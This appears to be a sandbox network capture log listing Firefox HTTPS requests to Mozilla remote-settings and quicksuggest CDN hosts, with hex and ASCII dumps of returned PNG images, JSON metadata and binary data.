2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 63 00 f0 dd a8 8f ae 7b 1d 2a bd 22 de ad d9 e6 bb 44 b8 fb b7 7c 61 2c b2 52 74 10 db 44 a6 f8 a8 47 c8 5e 41 f3 9a 19 d2 6e e2 cc 55 e4 3b 8a 6b 99 ef 9c c8 dc 4e c5 11 47 f6 a2 b4 e0 bd 7f 5c 84 1a 5e 80 5c 17 ad 59 07 6b cd 59 25 90 c1 ca 66 ff 96 35 f0 ad 64 b6 3f d8 17 bf 9c 1a 85 01 f1 1a e8 79 ad 7f 06 0c bd 86 20 c6 24 60 70 b2 16 73 46 87 e3 f9 05 b1 38 f0 68 12 e6 0e 33 48 80 50 ce e8 67 66 ae ee d8 6e 94 6f d9 73 c1 8f 2f 78 52 4b 65 0b 3d b6 f6 75 32 ea fe df c9 7a a7 70 36 22 4f d5 fa 5f da ae 4f b8 80 3f df 1c 83 a7 67 45 c3 dc e4 86 8d 8d fa 30 06 80 88 30 22 79 19 e7 6f 37 a3 b8 0d a4 38 f9 3b f4 e6 5f e1 b2 d3 4e 6b 00 49 0b 14 be fd 1a 1c ad 8d b2 9e 1f 60 00 e0 9b 33 58 da 03 33 22 b9 d0 79 29 5a 3e bd cc 7f f6 09 ff a6 f0 ab 99 b6 91 Data Ascii: c{*"D\|a,RtDG^AnU;kNG\^\YkY%f5d?y $`psF8h3HPgfnos/xRKe=u2zp6"O_O?gE00"yo78;_NkI`3X3"y)Z>
2024-07-26 18:11:05 UTC	768	IN	Data Raw: 97 d3 6d 4b 17 d0 0f ef b8 17 2d 66 4b 8f e1 ae 47 5f 94 9b 84 1d bf 5d 26 ae 9b 3f 9e 56 1d fc 98 93 9c 90 e6 06 dc d6 f3 44 8e 92 ff fc 53 5c 33 73 2c cd 7f 75 4d 8f 2b 9e 4b f2 e2 67 76 1f a3 6b 66 cf a4 db 9e 58 84 f6 c6 a2 90 33 0b 92 ba 8f e4 0b 37 f6 d2 4d 3f b9 81 b1 fc 7b 50 7b b4 ea 92 3c ca 25 eb 04 b7 1d f4 c0 cb ef 89 ef 4e b9 82 1e 5c fe 6b 80 d6 48 aa 30 98 81 c0 93 37 b8 e0 1d ad c5 f4 8b 3f dc c7 de 3d 97 1e 7d ff bf 97 f4 91 2e 79 a7 b4 98 9b e9 e7 bf fa 03 53 81 23 e9 b1 35 cf b2 bf d4 71 32 a4 e8 fd 0b be d3 cb 1a 8f e0 9d b6 52 06 f6 87 18 c9 1b 45 f7 be f0 1a ec 96 4b be 59 97 7c 0a 00 54 1f 36 d3 4d 3f 7e 9c f6 c9 f9 1b 19 b2 e8 6e 92 35 f7 07 30 c4 a7 c1 65 f7 14 ad 50 5a 55 06 1e fc e2 45 36 54 4c f8 96 f2 42 7a f4 bd d7 18 c0 df Data Ascii: mK-fKG_]&?VDS\3s,uM+KgvkfX37M?{P{<%N\kH07?=}.yS#5q2REKY\|T6M?~n50ePZUE6TLBz

Session ID	Source IP	Source Port	Destination IP	Destination Port
143	192.168.2.5	64283	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/d6977194-0ec3-4aef-b861-5cb96278213d HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840742160552 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 3555 x-goog-hash: crc32c=ykB02Q== x-goog-hash: md5=Oaeqi7O1m+fms8Fsd69rGg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 3555 X-GUploader-UploadID: AHxI1nN1mGwWPyM3v7cEPrJdsDaecFuzYriXgAPvFrdEsXYUBTwgOxdYdzwe51iUqxe15Ub1OuFlYH6Cbw Server: UploadServer Date: Wed, 24 Jul 2024 17:30:09 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:42 GMT ETag: "39a7aa8bb3b59be7e6b3c16c77af6b1a" Content-Type: application/octet-stream Age: 175256 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 75 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 Data Ascii: PNGIHDRL\tEXtSoftwareAdobe ImageReadyqe<uiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 33 36 37 61 65 66 31 2d 65 33 32 63 2d 34 64 34 63 2d 39 36 61 30 2d 61 33 32 30 66 63 34 66 34 36 38 64 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 36 33 36 37 61 65 66 31 2d 65 33 32 63 2d 34 64 34 63 2d 39 36 61 30 2d 61 33 32 30 66 63 34 66 34 36 38 64 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 Data Ascii: p:CreatorTool="Adobe Photoshop 22.3 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6367aef1-e32c-4d4c-96a0-a320fc4f468d" stRef:documentID="xmp.did:6367aef1-e32c-4d4c-96a0-a320fc4f468d"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: a5 04 96 a0 5d be c8 f3 47 00 19 7c f6 ec d9 aa cb ed db b7 ef d5 ab 17 19 a9 49 93 26 89 27 e3 02 2a e2 84 6a d9 b2 65 0b 14 28 a0 79 1e 1f e1 80 92 8c 00 25 e0 e1 c3 87 98 8b ad 92 21 0b 16 2c 48 0c a9 23 eb 0e 25 c1 e0 68 48 a2 44 c6 9c 39 73 50 80 31 63 c6 90 ee 7e 63 41 89 91 a4 16 cc 60 ef fb f6 ed c3 00 5f 87 e8 29 6a 64 90 3b 77 ee 25 4b 96 fc 52 23 d6 bc 79 f3 21 43 86 b8 e5 36 d5 0b ba 4c 66 7e fd fa b5 67 f2 ad 5b b7 f0 74 19 63 34 e7 28 35 a5 e0 f4 e9 d3 ee e4 c4 11 20 47 c9 d1 f3 16 49 da a5 4b 97 ce 96 2d 9b ce 74 1f 01 d3 a6 4d 53 82 01 9a db b6 6d db ce 9d 3b bb 32 f8 8b 20 1c 31 8c fd 8a 1a 13 d0 6e 75 eb 1f 24 4b 7c 77 ce bf 98 3f 7f fe cf e4 00 30 79 f2 e4 a9 53 a7 ba 45 21 4e 3a 62 c4 08 7c ed d2 a5 4b 1e 02 28 fe 64 cc d1 a3 dd e8 a0 Data Ascii: ]G\|I&'*je(y%!,H#%hHD9sP1c~cA`_)jd;w%KR#y!C6Lf~g[tc4(5 GIK-tMSm;2 1nu$K\|w?0ySE!N:b\|K(d
2024-07-26 18:11:05 UTC	73	IN	Data Raw: 80 11 60 30 02 8c 00 83 11 60 04 18 8c 00 23 c0 60 04 18 01 06 23 c0 08 30 18 01 46 80 c1 08 30 02 0c 46 80 11 60 30 02 8c 00 83 11 60 04 18 7c e0 bf 02 0c 00 ff 5b 1b d5 0e 8b 01 9a 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: `0`#`#0F0F`0`\|[IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port
144	192.168.2.5	64285	34.149.100.209	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	266	OUT	GET /v1/ HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	510	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 939 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Alert, Content-Type, Content-Length, Backoff, Retry-After X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:27:33 GMT Age: 2612 Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	880	IN	Data Raw: 7b 22 70 72 6f 6a 65 63 74 5f 6e 61 6d 65 22 3a 22 52 65 6d 6f 74 65 20 53 65 74 74 69 6e 67 73 20 50 52 4f 44 22 2c 22 70 72 6f 6a 65 63 74 5f 76 65 72 73 69 6f 6e 22 3a 22 31 38 2e 31 2e 31 22 2c 22 68 74 74 70 5f 61 70 69 5f 76 65 72 73 69 6f 6e 22 3a 22 31 2e 32 32 22 2c 22 70 72 6f 6a 65 63 74 5f 64 6f 63 73 22 3a 22 68 74 74 70 73 3a 2f 2f 72 65 6d 6f 74 65 2d 73 65 74 74 69 6e 67 73 2e 72 65 61 64 74 68 65 64 6f 63 73 2e 69 6f 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2e 73 65 74 74 69 6e 67 73 2e 73 65 72 76 69 63 65 73 2e 6d 6f 7a 69 6c 6c 61 2e 63 6f 6d 2f 76 31 2f 22 2c 22 73 65 74 74 69 6e 67 73 22 3a 7b 22 72 65 61 64 6f 6e 6c 79 22 3a 74 72 75 65 2c 22 62 61 74 63 68 5f 6d 61 78 5f 72 65 71 75 65 73 74 73 22 3a Data Ascii: {"project_name":"Remote Settings PROD","project_version":"18.1.1","http_api_version":"1.22","project_docs":"https://remote-settings.readthedocs.io","url":"https://firefox.settings.services.mozilla.com/v1/","settings":{"readonly":true,"batch_max_requests":
2024-07-26 18:11:05 UTC	59	IN	Data Raw: 3a 22 68 74 74 70 73 3a 2f 2f 66 69 72 65 66 6f 78 2d 73 65 74 74 69 6e 67 73 2d 61 74 74 61 63 68 6d 65 6e 74 73 2e 63 64 6e 2e 6d 6f 7a 69 6c 6c 61 2e 6e 65 74 2f 22 7d 7d 7d Data Ascii: :"https://firefox-settings-attachments.cdn.mozilla.net/"}}}

Session ID	Source IP	Source Port	Destination IP	Destination Port
145	192.168.2.5	64286	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/d7f071e9-d3de-4df6-9079-ca2e3ecddc08 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840742795425 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 3555 x-goog-hash: crc32c=ykB02Q== x-goog-hash: md5=Oaeqi7O1m+fms8Fsd69rGg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 3555 X-GUploader-UploadID: AHxI1nOQGDKOFl7HvqvZRybzohL3ttqReIwY3L1zxr7iJWfNHMiRPDZnGMyv8M2fultcD7RBBXKag5RSoA Server: UploadServer Date: Wed, 24 Jul 2024 17:30:08 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:42 GMT ETag: "39a7aa8bb3b59be7e6b3c16c77af6b1a" Content-Type: application/octet-stream Age: 175257 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 02 00 00 00 4c 5c f6 9c 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 75 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 Data Ascii: PNGIHDRL\tEXtSoftwareAdobe ImageReadyqe<uiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 36 33 36 37 61 65 66 31 2d 65 33 32 63 2d 34 64 34 63 2d 39 36 61 30 2d 61 33 32 30 66 63 34 66 34 36 38 64 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 36 33 36 37 61 65 66 31 2d 65 33 32 63 2d 34 64 34 63 2d 39 36 61 30 2d 61 33 32 30 66 63 34 66 34 36 38 64 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 Data Ascii: p:CreatorTool="Adobe Photoshop 22.3 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6367aef1-e32c-4d4c-96a0-a320fc4f468d" stRef:documentID="xmp.did:6367aef1-e32c-4d4c-96a0-a320fc4f468d"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: a5 04 96 a0 5d be c8 f3 47 00 19 7c f6 ec d9 aa cb ed db b7 ef d5 ab 17 19 a9 49 93 26 89 27 e3 02 2a e2 84 6a d9 b2 65 0b 14 28 a0 79 1e 1f e1 80 92 8c 00 25 e0 e1 c3 87 98 8b ad 92 21 0b 16 2c 48 0c a9 23 eb 0e 25 c1 e0 68 48 a2 44 c6 9c 39 73 50 80 31 63 c6 90 ee 7e 63 41 89 91 a4 16 cc 60 ef fb f6 ed c3 00 5f 87 e8 29 6a 64 90 3b 77 ee 25 4b 96 fc 52 23 d6 bc 79 f3 21 43 86 b8 e5 36 d5 0b ba 4c 66 7e fd fa b5 67 f2 ad 5b b7 f0 74 19 63 34 e7 28 35 a5 e0 f4 e9 d3 ee e4 c4 11 20 47 c9 d1 f3 16 49 da a5 4b 97 ce 96 2d 9b ce 74 1f 01 d3 a6 4d 53 82 01 9a db b6 6d db ce 9d 3b bb 32 f8 8b 20 1c 31 8c fd 8a 1a 13 d0 6e 75 eb 1f 24 4b 7c 77 ce bf 98 3f 7f fe cf e4 00 30 79 f2 e4 a9 53 a7 ba 45 21 4e 3a 62 c4 08 7c ed d2 a5 4b 1e 02 28 fe 64 cc d1 a3 dd e8 a0 Data Ascii: ]G\|I&'*je(y%!,H#%hHD9sP1c~cA`_)jd;w%KR#y!C6Lf~g[tc4(5 GIK-tMSm;2 1nu$K\|w?0ySE!N:b\|K(d
2024-07-26 18:11:05 UTC	73	IN	Data Raw: 80 11 60 30 02 8c 00 83 11 60 04 18 8c 00 23 c0 60 04 18 01 06 23 c0 08 30 18 01 46 80 c1 08 30 02 0c 46 80 11 60 30 02 8c 00 83 11 60 04 18 7c e0 bf 02 0c 00 ff 5b 1b d5 0e 8b 01 9a 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: `0`#`#0F0F`0`\|[IENDB`

Session ID	Source IP	Source Port	Destination IP	Destination Port
146	192.168.2.5	64295	34.117.121.53	443

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:05 UTC	334	OUT	GET /main-workspace/quicksuggest/c8ad0165-121f-4bc8-bdd1-a2822cb41726 HTTP/1.1 Host: firefox-settings-attachments.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:05 UTC	688	IN	HTTP/1.1 200 OK x-goog-generation: 1721840744044833 x-goog-metageneration: 1 x-goog-stored-content-encoding: identity x-goog-stored-content-length: 9157 x-goog-hash: crc32c=wNBqrg== x-goog-hash: md5=LxlKyUabu1F8TmMF1G9CWg== x-goog-storage-class: STANDARD Accept-Ranges: bytes Content-Length: 9157 X-GUploader-UploadID: AHxI1nMSb5gjLgjSDer0LXcp-cYDnlquTQjZxjGV7eJHt6WvWRF1gc7rbVkZ9olXyQSf6C88EuRmnMWY9Q Server: UploadServer Date: Wed, 24 Jul 2024 17:30:09 GMT Cache-Control: public,max-age=604800 Last-Modified: Wed, 24 Jul 2024 17:05:44 GMT ETag: "2f194ac9469bbb517c4e6305d46f425a" Content-Type: application/octet-stream Age: 175256 Alt-Svc: clear Connection: close
2024-07-26 18:11:05 UTC	702	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 80 00 00 00 80 08 06 00 00 00 c3 3e 61 cb 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 75 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 36 20 37 39 2e 31 36 34 37 35 33 2c 20 32 30 32 31 2f 30 32 2f 31 35 2d 31 31 3a 35 32 3a 31 33 20 20 Data Ascii: PNGIHDR>atEXtSoftwareAdobe ImageReadyqe<uiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 70 3a 43 72 65 61 74 6f 72 54 6f 6f 6c 3d 22 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 32 2e 33 20 28 4d 61 63 69 6e 74 6f 73 68 29 22 3e 20 3c 78 6d 70 4d 4d 3a 44 65 72 69 76 65 64 46 72 6f 6d 20 73 74 52 65 66 3a 69 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 63 64 35 35 32 37 34 36 2d 31 39 66 30 2d 34 62 62 64 2d 62 66 37 66 2d 34 66 32 36 65 66 61 65 63 65 61 31 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 63 64 35 35 32 37 34 36 2d 31 39 66 30 2d 34 62 62 64 2d 62 66 37 66 2d 34 66 32 36 65 66 61 65 63 65 61 31 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 Data Ascii: p:CreatorTool="Adobe Photoshop 22.3 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:cd552746-19f0-4bbd-bf7f-4f26efaecea1" stRef:documentID="xmp.did:cd552746-19f0-4bbd-bf7f-4f26efaecea1"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 37 da ae 1b e6 ff 97 c5 db d7 de 1f bb cd 43 fd df c9 01 48 42 6e 3f 9c c9 62 f2 29 ee b4 b4 f9 96 15 fa dc 8a 08 5a 84 ea 9e 56 b2 70 b4 12 dd 00 10 ec 1d 00 ad 2f 56 e2 8b 81 9c 1b 42 cb 16 4f 44 e1 9e c2 18 55 18 16 c7 8c f2 23 80 fa 7d 60 49 77 e7 4a 1e 82 67 16 03 24 b2 d4 0e 57 4a 1d 05 4b 6c c3 dd 2f cf 2a 95 7d e1 05 66 0a a3 6f 81 6b 0c ac 92 1b 46 67 cd d4 3b 21 06 c6 b0 8c 11 8a 71 8c 2d 16 42 1c 8e 8e cd 36 14 ad 85 78 01 2d fd 88 c2 92 8b 99 8c ef a9 09 b8 9c cd c7 71 82 f7 3d 8a 8e dc 8c a1 d4 73 98 94 71 3c c0 59 f3 1b 70 fb db f0 5c 52 ea 44 96 bf 33 3c f3 3c 7e 3f 05 a3 5f 5d f0 08 37 91 1f c0 67 16 0e d3 6d a8 8d 9e bf 15 37 b7 71 df 52 7a 08 7d 08 f0 be 08 c6 00 2a 65 5b 18 ee 2a dc b3 02 2d 6e 92 5d 06 87 f3 bb 6b 21 97 e2 cf 83 14 17 Data Ascii: 7CHBn?b)ZVp/VBODU#}`IwJg$WJKl/}fokFg;!q-B6x-q=sq<Yp\RD3<<~?_]7gm7qRz}e[*-n]k!
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 9d 7a 84 75 c6 d5 91 21 21 9d 2f fc 9a ab 3b d8 ed 67 2b 6a fa 62 02 d0 68 d9 4d e8 dc 3b 79 e1 16 f7 d4 61 f8 37 48 8b 3e 43 e8 86 b0 d8 e4 bb 4a ae 80 42 e1 5c 0e 3a 39 d1 0a 83 5b a9 77 22 a7 dc 69 8b 3e b8 70 80 f8 de a1 53 f9 16 11 87 b3 9c 52 2d 01 16 a8 a5 9b f8 6e 92 63 30 a0 1c f7 84 1d df 04 82 38 93 f2 fb 4c 04 cc e2 39 d0 2b 87 32 3e 95 20 a5 56 9b 0b c1 15 9a c2 01 91 6b f7 1e 18 66 66 d9 3d 65 33 db a2 e7 9a bc 48 88 34 10 84 75 81 71 7a e5 ac 96 eb 91 10 fd 1f 8d 02 de 09 8d b8 04 8b 63 3f 44 98 e8 53 34 09 9c dd d7 cc 73 d7 6c 05 56 dc 9d ad 03 58 9f 43 ba cc ca 67 9f 42 38 bc 04 a4 ef 09 6e f4 40 d9 eb 2a 4f 93 3e 97 26 82 d3 58 f8 30 34 34 48 5c 88 5e 88 b1 24 26 14 25 19 e5 5b c7 6c e3 d4 58 d0 26 66 5e 43 cd 6a 5a 00 08 1a 30 62 79 83 Data Ascii: zu!!/;g+jbhM;ya7H>CJB\:9[w"i>pSR-nc08L9+2> Vkff=e3H4uqzc?DS4slVXCgB8n@*O>&X044H\^$&%[lX&f^CjZ0by
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 1b b6 2e 6e 72 ce bb a7 7b bd 4b 32 cb 0a d8 2b 4b a1 fc 85 57 2b 90 d2 bd a2 5c 85 c2 df 1b 31 91 1b a9 b8 42 24 b0 eb ae 2e 5d db 27 5f ad 75 eb d2 c8 c9 50 d6 28 3e e6 55 4b 23 65 25 b3 bb 9c fb b2 81 29 bb ac c3 b8 74 74 eb dc 19 ec 7f b2 6a f8 fc b4 15 5f b4 43 8b 54 82 56 00 f9 24 ad 7b bc fc 4c 8e c6 f5 95 d4 87 fb 4a a3 35 ae d8 b3 8d 86 29 bb b0 d3 30 dc 3f e8 7e 00 1a 2a 29 21 c4 27 ce 34 13 60 63 20 82 45 08 b6 c5 92 6c e4 0a d9 9a 51 6e 0b f7 c4 b8 92 ae 6b 02 69 64 60 3a 8b 23 bc 04 83 98 52 b6 1b 78 a1 18 ca fd 69 91 84 c5 55 d6 20 0b 57 8a 89 b1 09 8a 8d c8 41 d0 5e 87 5d 5b b6 fd 1a c8 d6 04 da d8 2e 6d 97 60 b7 b6 00 34 4e a4 48 60 b9 8b d9 c5 72 32 79 42 45 0b 4b a2 e8 5b 37 88 c9 e0 fb d1 37 e4 09 6c ba 05 67 7a 96 48 41 dc 6c 4d a6 23 Data Ascii: .nr{K2+KW+\1B$.]'_uP(>UK#e%)ttj_CTV${LJ5)0?~*)!'4`c ElQnkid`:#RxiU WA^][.m`4NH`r2yBEK[77lgzHAlM#
2024-07-26 18:11:05 UTC	1390	IN	Data Raw: 22 57 9e 10 65 cc 49 01 84 47 01 84 a7 ea 4d b6 0b bc 53 6f 5f 1f ab 56 95 cb 96 b6 b7 1a b0 dd 2d 61 75 34 9e 13 a1 22 e6 de 5d 65 ef 6a 98 4e c1 2a 4f 91 2e 4d 76 31 f7 89 3c 4d 4f 56 51 34 42 d6 9d 59 fb 5c 1c 06 b7 60 22 24 26 fa 68 1e f0 43 1b 4c fc 39 26 eb 5d 62 aa e0 f4 23 34 74 1f 90 fd c7 19 e7 a7 c1 a1 9c d5 65 c6 ff 01 2b 7c 30 d4 e6 c3 b8 ef a4 4c ca bb 31 b4 c7 71 6e fe b3 b5 9e fd 73 19 5c 36 d4 6a 91 32 96 08 29 2e c2 3b 8f c2 93 35 c4 e8 0c 4c fc 19 78 a6 bf 85 7f fa f7 d2 10 17 61 d0 5f e0 41 70 0c da ea b1 54 3f 50 f2 e1 76 db 5e b0 66 b4 79 d7 41 03 6a d9 dc 46 9b 8d 55 a2 f7 24 4a cd 46 7f 9f c7 e7 4e e8 e0 13 e8 5f 15 c0 58 14 6b 73 2f bc d1 62 5b 6c 90 7d 01 c4 f5 49 1c bf a3 58 46 66 df c6 d9 65 fd 63 63 a4 87 9d 9a d5 ca 57 65 ae Data Ascii: "WeIGMSo_V-au4"]ejN*O.Mv1<MOVQ4BY\`"$&hCL9&]b#4te+\|0L1qns\6j2).;5Lxa_ApT?Pv^fyAjFU$JFN_Xks/b[l}IXFfeccWe
